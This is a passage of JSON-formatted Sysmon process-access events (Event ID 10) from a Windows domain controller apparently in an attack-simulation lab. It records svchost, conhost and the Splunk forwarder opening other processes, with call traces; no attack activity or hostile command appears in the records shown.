C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3237,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3238,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3239,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3240,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3241,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3242,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3243,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-00109A5A0500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-00109A5A0500}","TargetProcessId":"5032","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3244,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.940\r\nSourceProcessGUID: {E2A3D6B1-10FF-5F25-0000-00109A5A0500}\r\nSourceProcessId: 5032\r\nSourceThreadId: 3356\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.940","SourceProcessGUID":"{E2A3D6B1-10FF-5F25-0000-00109A5A0500}","SourceProcessId":"5032","SourceThreadId":"3356","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program 